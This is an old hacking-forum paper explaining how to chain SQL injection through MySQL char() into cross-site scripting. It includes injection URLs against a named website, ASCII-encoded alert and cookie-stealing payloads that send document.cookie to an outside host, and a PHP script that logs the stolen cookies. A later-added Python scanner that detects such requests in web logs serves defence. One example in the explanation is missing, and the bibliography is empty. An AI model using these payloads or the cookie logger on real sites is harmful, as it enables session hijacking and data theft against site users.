[------------------------------------------------------------------------]
[+] Summary
[1] Presentation
[2] Explanation
[3] Demonstration
[4] Bibliography
[------------------------------------------------------------------------]
[1] --[Presentation]--
XFS is an SQL injection variant that lets you return JavaScript code through the
function char().
This function converts an ASCII code to a character, which is why we can use it
to execute JavaScript code.
XFS gives you a restricted XSS possibility on top of the SQL injection
vulnerability itself.
In the next parts you will see the conditions needed to do it, how it works, and
a demonstration.
[2] --[Explanation]--
To use it, you need to convert your string to ASCII codes (online converter :
http://www.easycalculation.com/ascii-hex.php).
Char() reads the ASCII codes and returns the corresponding characters, so if you
insert the ASCII codes of your JavaScript, char() returns the JavaScript code
and it gets executed. BUT when you encode your JavaScript code, the code mustn't
contain any space, so the XSS is restricted;
you can still grab cookies, alert, and do a lot of other XSS things.
Example :
If you want to convert your JavaScript code to ASCII, for it to work the
JavaScript code mustn't look like this :
When the code is converted to ASCII, you get something like this :
46 65 42 12 85 68 ...
[3] --[Demonstration]--
Vulnerable website :
- http://landfill.elvinbts.org/show_activity.php?id=null+union+select+1,2,3,4,5,char(ASCII_CODE),7,8--
Alert :
################################
#
#- String : <SCRIPT>alert('xss')</script>
#
#- ASCII : 60 83 67 82 73 80 84 62 97 108 101 114 116 40 39 120 115 115 39 41 60
# 47 115 99 114 105 112 116 62
#
################################
Cookie Grabber :
################################
#
#- String : <SCRIPT>location.href='http://www.yoursite.com/cookie.php?
#cookie='+escape(document.cookie)</SCRIPT>
#
#- ASCII : 60 83 67 82 73 80 84 62 108 111 99 97 116 105 111 110 46 104 114 101 102
# 61 39 104 116 116 112 58 47 47 119 119 119 46 121 111 117 114 115 105 116 101 46 99
# 111 109 47 99 111 111 107 105 101 46 112 104 112 63 99 111 111 107 105 101 61 39 43
# 101 115 99 97 112 101 40 100 111 99 117 109 101 110 116 46 99 111 111 107 105 101
# 41 60 47 83 67 82 73 80 84 62
#
################################
################################
#
# <?php
#
# $cookies = $_GET["cookie"];
#
# if($cookies)
# {
#
# $grab = fopen("grab.txt","a");
# fputs($grab, $cookies . "\r\n");
# fclose($grab);
#
# }
#
# ?>
#
################################
So before inserting your ASCII codes in char(), you must replace every space in
the ASCII code by ",".
Example :
################################
# 45 52 86 23 54 ...
# To :
# 45,52,86,23,54 ...
################################
So let's go :
Alert :
http://landfill.elvinbts.org/show_activity.php?id=null+union+select+1,2,3,4,5,char(60,83,67,82,73,80,84,62,97,108,101,114,116,40,39,120,115,115,39,41,60,47,115,99,114,105,112,116,62),7,8--
You can see an alert box pop up with the text "XSS" => that's the XSS alert.
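Because the injected markup only exists as a list of numbers inside char(), a plain
string match for "<script" on the request will miss it. The following Python
scanner, added here as an example and not part of the original paper, shows the
defender's side of both the Explanation and the Demonstration above: it pulls
the request line out of constructed web-server log entries, decodes every MySQL
char(n,n,...) call exactly as the database would, and flags decoded strings that
build HTML or JavaScript. The log lines, IP addresses and the hint list are
constructed for the example. Prepared statements on the SQL side and HTML output
encoding on the page side remove both halves of this technique; the scanner is
for spotting attempts in existing traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache common-log style), not real traffic.
# Line 2 carries the demonstration URL from the paper; line 3 is a harmless
# char() call used to show that decoding alone is not a verdict.
SAMPLE_LOGS = [
    '10.0.0.5 - - [04/Aug/2009:10:00:01 +0000] "GET /show_activity.php?id=17 HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/Aug/2009:10:00:07 +0000] "GET /show_activity.php?id=null+union+select'
    '+1,2,3,4,5,char(60,83,67,82,73,80,84,62,97,108,101,114,116,40,39,120,115,115,39,41,'
    '60,47,115,99,114,105,112,116,62),7,8-- HTTP/1.1" 200 2048',
    '10.0.0.9 - - [04/Aug/2009:10:00:09 +0000] "GET /show_activity.php?id=5+union+select'
    '+1,2,3,4,5,char(104,105),7,8-- HTTP/1.1" 200 2048',
]

# char( 60 , 83 , ... ) with optional whitespace, case-insensitive like MySQL.
CHAR_CALL = re.compile(r"char\(\s*([0-9]+(?:\s*,\s*[0-9]+)*)\s*\)", re.IGNORECASE)
# Request target between the method and the protocol in a common-log line.
REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
# Substrings (constructed list) that indicate the decoded text is markup/JS.
MARKUP_HINTS = ("<script", "location.href", "document.cookie", "onerror", "<img")


def decode_char_calls(query: str) -> list[str]:
    """Return the string each char(n,n,...) call in `query` would produce.

    MySQL's CHAR() turns every integer argument into the byte with that value;
    the page only uses 0-255, so chr() on each code reproduces the result.
    """
    decoded = []
    for match in CHAR_CALL.finditer(query):
        codes = [int(code) for code in match.group(1).split(",")]
        decoded.append("".join(chr(code) for code in codes))
    return decoded


def analyse_request(target: str) -> dict:
    """Decode char() calls in one request target and flag markup-building ones."""
    # '+' was used for spaces in the paper's URL, so unquote_plus restores them
    # along with any %xx escapes before the SQL-looking text is inspected.
    url = unquote_plus(target)
    payloads = decode_char_calls(url)
    suspicious = [p for p in payloads if any(h in p.lower() for h in MARKUP_HINTS)]
    return {
        "url": url,
        "decoded": payloads,
        "suspicious": suspicious,
        "union_select": "union select" in url.lower(),
    }


def scan_logs(lines) -> list[dict]:
    """Return an analysis record for every request that uses char() or UNION SELECT."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        record = analyse_request(match.group(1))
        if record["decoded"] or record["union_select"]:
            findings.append(record)
    return findings


if __name__ == "__main__":
    for record in scan_logs(SAMPLE_LOGS):
        verdict = "XSS payload" if record["suspicious"] else "SQLi only"
        print(f"{verdict}: {record['url']}")
        for payload in record["decoded"]:
            print(f"    char() decodes to: {payload!r}")
```

Run against the constructed lines, the scanner reports the paper's demonstration
URL as an XSS payload and prints the decoded `<SCRIPT>alert('xss')</script>`,
while the third line is reported as an injection attempt whose char() value is
just "hi"; the first, normal request is not reported at all.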
[4] --[Bibliography]--
SQL tutorial :
[------------------------------------------------------------------------]
[Thanks to] : Moudi, J.consultant, Sheiry, Pr0h4ck3rz, Stacker, Shimik Root aka
Str0zen & Security-Shell Community
# milw0rm.com [2009-08-04]